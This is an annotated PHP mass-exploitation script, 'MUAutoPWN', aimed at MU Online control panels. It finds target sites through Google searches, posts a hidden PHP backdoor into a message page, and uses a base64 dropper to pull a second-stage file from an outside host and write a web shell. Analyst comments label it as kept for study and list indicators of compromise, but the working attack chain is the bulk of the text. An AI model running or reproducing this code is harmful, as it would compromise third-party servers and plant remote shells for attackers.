
<?

php
/**
* MU Online Control Panel Remote Code Execution.
* Author: Ahlspiess
* Ref: http://w3.tbd.my/thread-5711.html
* Note: The Google dork is only a rough guess; change it as needed. (Original note, Malay: "Dork tu agak gak sile tukar ye.")
*/
/**
 * MUAutoPWN — mass-exploitation script, left byte-identical here for analysis.
 * Do not run it: it searches Google for third-party "mu online" sites and
 * tries to plant a PHP backdoor on every hit.
 *
 * Everything happens from the constructor (instantiation == full run):
 *   1. google()  scrapes up to 9 pages of Google Custom Search results for
 *                the dork "mu+online".
 *   2. Exploit() per result: GET <site>/sub_pages/messages/messages.php and
 *                require "200 OK"; skip hosts that already answer the
 *                PwnED() liveness probe; otherwise POST a "message" whose
 *                text field carries $rceshell, re-probe, and on success POST
 *                the decoded $phpshell to the backdoored page so that it
 *                writes /sub_pages/messages/message.php.
 *   3. save()    appends hit/duplicate lists next to this script.
 *
 * The script assumes messages.php stores the submitted text and later
 * executes it as PHP; the underlying flaw in the control panel is not shown
 * in this file, only probed for.
 *
 * Indicators of compromise (all taken from literals in this file):
 *   - stored message text containing
 *     <!--MUAUTOPWN<?php @system($_REQUEST[c]);@eval($_REQUEST[p]); ?>-->
 *   - messages posted as user "MUAutoPWN" / mail "MUAutoPWN@gmail.com"
 *   - POST bodies starting with "p=" whose reply contains "AhliSyurgaCrew"
 *   - a new or modified /sub_pages/messages/message.php
 *   - outbound fetch of http://targetsecurityindia.com/xmlrpc/x.txt from the
 *     web server (second-stage source, see $phpshell)
 *   - requests carrying the User-Agent hard-coded in connect()
 * Operator-side artefacts: GoogleResult_<ts>.txt, MUDuplicate_<ts>.txt,
 * RCEShell.txt, Shell.txt and Cookie_<ts>.txt in the script's directory.
 */
class MUAutoPWN {
// Stage 1: PHP backdoor wrapped in an HTML comment so it is invisible when the
// stored message is rendered. `c` -> system(), `p` -> eval(), both via $_REQUEST.
var $rceshell = "<!--MUAUTOPWN<?php @system(\$_REQUEST[c]);@eval(\$_REQU
EST[p]); ?>-->";
// Stage 2, base64. Decodes to:
//   p=stripslashes(fwrite(fopen(\$_POST[z],\$_POST[a]),file_get_contents(\$_POST[e])));
//   &z=message.php&a=w&e=http://targetsecurityindia.com/xmlrpc/x.txt
// i.e. an eval'd dropper that opens message.php for writing and fills it with
// whatever the remote x.txt serves. The decoded text really contains the
// backslash before each `$` (it is in the base64 as-is).
var $phpshell = "cD1zdHJpcHNsYXNoZXMoZndyaXRlKGZvcGVuKFwkX1BPU1Rbel0sXCR
fUE9TVFthXSksZmlsZV9nZXRfY29udGVudHMoXCRfUE9TVFtlXSkpKTsmej1tZXNzYWdlLnBocCZhPXc
mZT1odHRwOi8vdGFyZ2V0c2VjdXJpdHlpbmRpYS5jb20veG1scnBjL3gudHh0";
// Form body for the message post; %s is filled with $rceshell by sprintf()
// in Exploit(). The user/mail values are a cheap detection signature.
var $payload = "form_submit=1&user=MUAutoPWN&mail=MUAutoPWN@gmail.com&te
xt=%s";
// Liveness probe, base64. Decodes to: p=echo(\$_POST[echo]);&echo=AhliSyurgaCrew
// PwnED() greps the reply for "AhliSyurgaCrew" to decide the backdoor is live.
var $pwned = "cD1lY2hvKFwkX1BPU1RbZWNob10pOyZlY2hvPUFobGlTeXVyZ2FDcmV3";
// Page that is probed for and that stage 1 is posted to.
var $vulnfile = "/sub_pages/messages/messages.php";
// File stage 2 creates; its existence (200 OK) is the final success check.
var $shell = "/sub_pages/messages/message.php";
// Accepted values for argv[1]; only used for validation in __construct().
var $country = array('MIL','AF','AL','DZ','AS','AD','AO','AI','AQ','AG',
'AR','AM','AW','AU','AT','AZ','BS','BH','BD','BB','BY','BE','BZ','BJ','BM','BT',
'BO','BA','BW','BV','BR','IO','BN','BG','BF','BI','KH','CM','CA','CV','KY','CF',
'TD','CL','CN','CX','CC','CO','KM','CG','CD','CK','CR','CI','HR','CY','CZ','DK',
'DJ','DM','DO','TL','EC','EG','SV','GQ','ER','EE','ET','FK','FO','FJ','FI','FR',
'GF','PF','TF','GA','GM','GE','DE','GH','GI','GR','GL','GD','GP','GU','GT','GN',
'GW','GY','HT','HM','HN','HK','HU','IS','IN','ID','IQ','IE','IL','IT','JM','JP',
'JO','KZ','KE','KI','KW','KG','LA','LV','LB','LS','LR','LY','LI','LT','LU','MO',
'MK','MG','MW','MY','MV','ML','MT','MH','MQ','MR','MU','YT','MX','FM','MD','MC',
'MN','MS','MA','MZ','NA','NR','NP','NL','AN','NC','NZ','NI','NE','NG','NU','NF',
'MP','NO','OM','PK','PW','PS','PA','PG','PY','PE','PH','PN','PL','PT','PR','QA',
'RE','RO','RU','RW','KN','LC','VC','WS','SM','ST','SA','SN','CS','SC','SL','SG',
'SK','SI','SB','SO','ZA','GS','KR','ES','LK','SH','PM','SR','SJ','SZ','SE','CH',
'TW','TJ','TZ','TH','TG','TK','TO','TT','TN','TR','TM','TC','TV','UG','UA','AE',
'GB','US','UM','UY','UZ','VU','VA','VE','VN','VG','VI','WF','EH','YE','ZM','ZW')
;
// Run timestamp; suffixes the per-run output and cookie files.
var $time;
/**
 * Entry point: validates argv[1] against $country, then runs the whole
 * search-and-exploit loop. Note that google() is called with a local
 * `$country` that is never assigned (it is neither argv[1] nor
 * $this->country), so the `cr=country` filter goes out with an empty code
 * and the validation above does not actually narrow the search.
 */
function __construct() {
global $argv;
if(!$argv[1]) die("Usage: php $argv[0] country_code");
if(!in_array(strtoupper($argv[1]), $this->country))
{
die("Tak de dlm senarai!"); // Malay: "Not in the list!"
}
else
{
$this->time = time();
$result = $this->google("mu+online", $country);
// $result is an array of per-page arrays of hrefs (see google()).
foreach($result as $count)
{
foreach($count as $links)
{
$this->save(dirn
ame(__FILE__)."/GoogleResult_{$this->time}.txt", $links."\n", 'a');
$this->Exploit($
links);
}
}
}

}
/**
 * Probe one site and, if it looks vulnerable and is not already backdoored,
 * plant stage 1 then stage 2. Logs to stdout via e() and to RCEShell.txt /
 * Shell.txt / MUDuplicate_<ts>.txt via save().
 *
 * @param string $link  base URL scraped from Google; a leading
 *                      "/interstitial?url=" wrapper is stripped first.
 */
function Exploit($link) {
$link = str_replace("/interstitial?url=", "", $link);
$this->e("[+] $link");
// Only continue if messages.php answers 200 OK.
if($this->isOK($link.$this->vulnfile))
{
// Already-backdoored hosts are recorded as duplicates, not re-exploited.
if(!$this->PwnED($link.$this->vulnfile))
{
// Post the stage-1 backdoor as a message.
if($this->connect($link, 1, spri
ntf($this->payload, $this->rceshell)))
{
// Re-probe: success means the stored text is now executed as PHP.
if($this->PwnED(
$link.$this->vulnfile))
{
$this->e("[RCE] ".$link.$this->vulnfile);
$this->save(dirname(__FILE__)."/RCEShell.txt", "[RCE] ".$link.$this->vulnfile."\
n", 'a');
// Stage 2: eval the dropper through the backdoor, then check message.php exists.
if($this->connect($link.$this->vulnfile, 1, $this->decode($this->phpshell)) && $
this->isOK($link.$this->shell))
{
$this->e("[Shell] ".$link.$this->shell);
$this->save(dirname(__FILE__)."/Shell.txt", "[Shell] ".$link.$this->shell."\n",
'a');
}
else
{
// Same "[Shell]" line as the success branch, so console output cannot
// distinguish a failed stage 2; only Shell.txt is authoritative.
$this->e("[Shell] ".$link.$this->shell);
}
}
else
{
$this->e("[RCE] ".$link.$this->vulnfile." - Failed");
}
}
}
else
{
$this->e("[Duplicate] $link");
$this->save(dirname(__FILE__)."/
MUDuplicate_{$this->time}.txt", "[Duplicate] ".$link."\n", 'a');
}
}
}
/**
 * Backdoor liveness probe: POSTs the decoded $pwned payload and returns 1 if
 * the response body contains "AhliSyurgaCrew" (the echo the payload asks
 * for), else 0.
 *
 * @param string $site  full URL of messages.php on the target
 * @return int 1 or 0
 */
function PwnED($site) {
if(preg_match("/AhliSyurgaCrew/", $this->connect($site, 1, $this
->decode($this->pwned))))

{
return 1;
}
else
{
return 0;
}
}
/**
 * GET $site and return 1 if the raw response (headers included, see
 * CURLOPT_HEADER in connect()) contains "200 OK", else 0. Because
 * connect() follows redirects, this reflects the final hop.
 *
 * @param string $site
 * @return int 1 or 0
 */
function isOK($site) {
$c = $this->connect($site);
if(preg_match("/200 OK/", $c))
{
return 1;
}
else
{
return 0;
}
}
/**
 * Scrape Google Custom Search (google.com.my, num=100, start=0..800) for
 * $dork and pull hrefs out of the result markup.
 *
 * @param string $dork     query string, already URL-encoded by the caller
 * @param string $country  appended to "cr=country" (see __construct() note)
 * @return array|int  list of per-page href arrays ($links[2] of each
 *                    preg_match_all), or 0 if $result was never set. The
 *                    markup regex is tied to the 2010-era Google layout;
 *                    @ suppresses preg errors, and if no page matched,
 *                    $result is undefined when the counting loop below runs.
 */
function google($dork, $country) {
$this->e("[+] Start google search for '".$dork."");
for($i = 0; $i < 900; $i+=100) {
$fp = $this->connect("http://www.google.com.my/custom?nu
m=100&hl=en&cr=country".$country."&safe=off&client=pub-8993703457585266&ei=ZoUyT
LCmOI-UrAeP79z2Bg&q=".$dork."&start=".$i."&sa=N");
#$fp = $this->connect("http://www.google.com.my/custom?n
um=100&hl=en&safe=off&client=pub-8993703457585266&ei=ZoUyTLCmOI-UrAeP79z2Bg&q=".
$dork."&start=".$i."&sa=N");
@preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" clas
s=(.*?)>/", $fp, $links);
$result[] = $links[2];
}
$this->e("[+] Google search for '".$dork."' finished");
$total = 0;
foreach($result as $count) {
foreach($count as $links) {
$total++;
}
}
$this->e("[+] Total result found: ".$total);
if(isset($result)) {
return $result;
} else {
return 0;
}
}
/**
 * Thin cURL wrapper used for every request in this file.
 *
 * @param string $url
 * @param int    $post        >0 sends a POST with $postfields
 * @param string $postfields  raw body (form-encoded strings in this file)
 * @return string|int  full response (headers + body) or 0 on failure/empty
 *
 * Notable settings: TLS peer verification is disabled; redirects are
 * followed; a 15 s timeout; cookies persist per run in Cookie_<ts>.txt;
 * and a fixed Firefox 3.6.6 / .NET CLR User-Agent that identifies this
 * scanner in target access logs. The proxy block is commented out.
 */
function connect($url, $post = 0, $postfields = '') {
$ch = curl_init();
/*$proxy = "202.71.104.228";
$port = "54321";
curl_setopt($ch, CURLOPT_PROXY, $proxy);
curl_setopt($ch, CURLOPT_PROXYPORT, $port);*/
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Wi


ndows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.307
29; .NET4.0E)");
curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/Cookie_'
.$this->time.'.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/Cookie_
'.$this->time.'.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
if($post > 0) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
}
$data = curl_exec($ch);
// Handle is never curl_close()d; relies on PHP freeing it at scope end.
if($data) {
return $data;
} else {
return 0;
}
}
/** base64 decoder for the $phpshell / $pwned payload strings. */
function decode($str) {
return base64_decode($str);
}
/**
 * Write $text to $filename with fopen mode $mode ('a' everywhere in this
 * file). No error checking on fopen().
 */
function save($filename, $text, $mode) {
$f = fopen($filename, $mode);
fwrite($f, $text);
fclose($f);
}
/** Console logger: prints $text followed by CRLF. */
function e($text) {
print $text."\r\n";
}
}
// Instantiation alone runs the entire scan-and-exploit chain: __construct()
// reads $argv, queries Google and calls Exploit() on every result.
$obai = new MUAutoPWN;
?>
